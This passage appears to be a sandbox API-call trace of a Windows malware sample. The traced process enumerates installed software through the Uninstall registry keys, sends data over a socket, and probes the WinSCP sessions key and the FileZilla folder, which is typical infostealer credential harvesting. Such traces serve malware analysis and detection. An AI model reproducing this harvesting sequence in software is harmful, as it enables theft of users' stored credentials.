lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7e) returned 0x0 [0221.471] RegCloseKey (hKey=0x314) returned 0x0 [0221.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.472] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x39, lpcbData=0x27e7e8*=0x1e) returned 0x0 [0221.472] RegCloseKey (hKey=0x314) returned 0x0 [0221.472] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1e, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.473] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7c) returned 0x0 [0221.473] RegCloseKey (hKey=0x314) returned 0x0 [0221.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.474] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x16) returned 0x0 [0221.474] RegCloseKey (hKey=0x314) returned 0x0 [0221.474] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1f, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.475] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x76) returned 0x0 [0221.475] RegCloseKey (hKey=0x314) returned 0x0 [0221.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.480] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x16) returned 0x0 [0221.481] RegCloseKey (hKey=0x314) returned 0x0 [0221.481] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x20, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.481] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.482] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7a) returned 0x0 [0221.482] RegCloseKey (hKey=0x314) returned 0x0 [0221.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.482] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1a) returned 0x0 [0221.482] RegCloseKey (hKey=0x314) returned 0x0 [0221.483] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x21, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.483] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7a) returned 0x0 [0221.483] RegCloseKey (hKey=0x314) returned 0x0 [0221.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.484] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1a) returned 0x0 [0221.484] RegCloseKey (hKey=0x314) returned 0x0 [0221.484] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x22, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.485] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x78) returned 0x0 [0221.485] RegCloseKey (hKey=0x314) returned 0x0 [0221.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.486] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x16) returned 0x0 [0221.486] RegCloseKey (hKey=0x314) returned 0x0 [0221.486] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x23, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.487] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.487] RegCloseKey (hKey=0x314) returned 0x0 [0221.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.487] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.488] RegCloseKey (hKey=0x314) returned 0x0 [0221.488] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x24, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.488] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.489] RegCloseKey (hKey=0x314) returned 0x0 [0221.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.489] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.489] RegCloseKey (hKey=0x314) returned 0x0 [0221.490] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x25, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.490] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.490] RegCloseKey (hKey=0x314) returned 0x0 [0221.492] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.492] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.492] RegCloseKey (hKey=0x314) returned 0x0 [0221.492] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x26, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.493] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.493] RegCloseKey (hKey=0x314) returned 0x0 [0221.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.494] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.494] RegCloseKey (hKey=0x314) returned 0x0 [0221.494] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x27, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.495] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.495] RegCloseKey (hKey=0x314) returned 0x0 [0221.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.496] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.496] RegCloseKey (hKey=0x314) returned 0x0 [0221.496] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x28, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.496] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.497] RegCloseKey (hKey=0x314) returned 0x0 [0221.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.497] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.497] RegCloseKey (hKey=0x314) returned 0x0 [0221.498] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x29, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.498] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.499] RegCloseKey (hKey=0x314) returned 0x0 [0221.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.499] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.499] RegCloseKey (hKey=0x314) returned 0x0 [0221.499] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2a, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.500] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7c) returned 0x0 [0221.500] RegCloseKey (hKey=0x314) returned 0x0 [0221.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.501] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x16) returned 0x0 [0221.501] RegCloseKey (hKey=0x314) returned 0x0 [0221.502] send (s=0x300, buf=0x301288*, len=1852, flags=0) returned 1852 [0221.502] send (s=0x300, buf=0x3019c4*, len=1853, flags=0) returned 1853 [0221.503] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions", ulOptions=0x0, samDesired=0x20019, phkResult=0x27ecac | out: phkResult=0x27ecac*=0x0) returned 0x2 [0221.505] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\filezilla"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0221.505] GetLastError () returned 0x2 [0221.505] GetProcessHeap () returned 0x2b0000 [0221.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3022b8 | out: hHeap=0x2b0000) returned 1 [0221.505] GetProcessHeap () returned 0x2b0000 [0221.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ec508 [0221.505] GetProcessHeap () returned 0x2b0000 [0221.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3b8 | out: hHeap=0x2b0000) returned 1 [0221.505] GetProcessHeap () returned 0x2b0000 [0221.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec508 | out: hHeap=0x2b0000) returned 1 [0221.506] GetProcessHeap () returned 0x2b0000 [0221.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ec508 [0221.506] GetProcessHeap () returned 0x2b0000 [0221.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2cefd0 [0221.506] GetProcessHeap () returned 0x2b0000 [0221.506] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cefd0, Size=0x30) returned 0x2ec3b8 [0221.506] GetProcessHeap () returned 0x2b0000 [0221.506] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec3b8, Size=0x60) returned 0x3022b8 [0221.506] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\filezilla"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0221.507] GetLastError () returned 0x2 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3022b8 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ec3b8 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec508 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3b8 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6680 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6630 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.507] GetProcessHeap () returned 0x2b0000 [0221.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.508] GetProcessHeap () returned 0x2b0000 [0221.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.508] GetProcessHeap () returned 0x2b0000 [0221.508] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.508] send (s=0x300, buf=0x2f52e0*, len=4, flags=0) returned 4 [0221.508] send (s=0x300, buf=0x2f52e4*, len=5, flags=0) returned 5 [0221.508] GetProcessHeap () returned 0x2b0000 [0221.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.508] GetProcessHeap () returned 0x2b0000 [0221.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08f0 | out: hHeap=0x2b0000) returned 1 [0221.508] GetProcessHeap () returned 0x2b0000 [0221.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x48) returned 0x2c6630 [0221.509] GetProcessHeap () returned 0x2b0000 [0221.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1f) returned 0x2ed080 [0221.509] GetProcessHeap () returned 0x2b0000 [0221.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.509] GetProcessHeap () returned 0x2b0000 [0221.509] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x3) returned 0x2f08e0 [0221.509] GetProcessHeap () returned 0x2b0000 [0221.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, 